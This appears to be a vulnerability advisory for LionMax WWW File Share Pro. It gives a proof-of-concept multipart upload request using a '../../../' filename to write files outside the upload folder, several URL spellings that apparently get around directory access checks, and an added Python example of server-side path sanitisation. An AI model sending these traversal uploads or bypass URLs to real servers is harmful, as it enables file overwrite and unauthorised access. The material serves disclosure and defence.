LionMax Software WWW File Share Pro Multiple Remote Vulnerabilities
The following proof of concept exploits were supplied:

POST /upload2.htm HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------00000000000000000000000000000
Content-Length: ignored_by_this_specific_server

-----------------------------00000000000000000000000000000
Content-Disposition: form-data; name="file"; filename="../../../badfile.txt"
Content-Type: text/plain

I'm a bad file in a bad location. If you see me you are vulnerable because an attacker can upload a malicious file everywhere in your system overwriting any existent file. Now go to download the latest patch for your webserver or disable the Upload function!
-----------------------------00000000000000000000000000000
Content-Disposition: form-data; name="Submit"

Upload
-----------------------------00000000000000000000000000000--

http://server/directory./
http://server/\directory/
http://server///directory/
"GET \directory/ HTTP/1.0"
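The server-side checks that the upload request and the URL forms above call for, as an added example that is not part of the original advisory or the vendor's code. All function names and the PROTECTED table are hypothetical, and the example assumes the listed URL forms are alternate spellings of one directory that a path-based check has to treat identically.

```python
import os
from urllib.parse import unquote

def safe_upload_path(upload_root, client_filename):
    """Map a client-supplied multipart filename to a path inside upload_root."""
    # Treat '\' and '/' alike and keep only the last component.
    name = client_filename.replace("\\", "/").rsplit("/", 1)[-1]
    name = name.rstrip(". ")  # Windows drops trailing dots and spaces
    if not name or "\x00" in name or ":" in name:
        raise ValueError("rejected upload filename: %r" % client_filename)
    root = os.path.realpath(upload_root)
    target = os.path.realpath(os.path.join(root, name))
    # Catches a pre-existing symlink in the upload directory pointing elsewhere.
    if os.path.commonpath([root, target]) != root:
        raise ValueError("upload escapes upload root: %r" % client_filename)
    return target

def canonical_request_path(raw_path):
    """Collapse alternate spellings of a request path into one form."""
    segments = []
    for seg in unquote(raw_path).replace("\\", "/").split("/"):
        stripped = seg.rstrip(". ")  # 'directory.' and 'directory' are one folder
        if not stripped:
            if seg.startswith(".."):
                raise ValueError("parent reference in path: %r" % raw_path)
            continue  # empty segment from '//' or a bare '.'
        segments.append(stripped)
    return "/" + "/".join(segments)

# Hypothetical access-control table, keyed by canonical path.
PROTECTED = {"/directory"}

def requires_auth(raw_path):
    """Decide on the canonical path, never on the raw request line."""
    path = canonical_request_path(raw_path)
    return any(path == p or path.startswith(p + "/") for p in PROTECTED)
```
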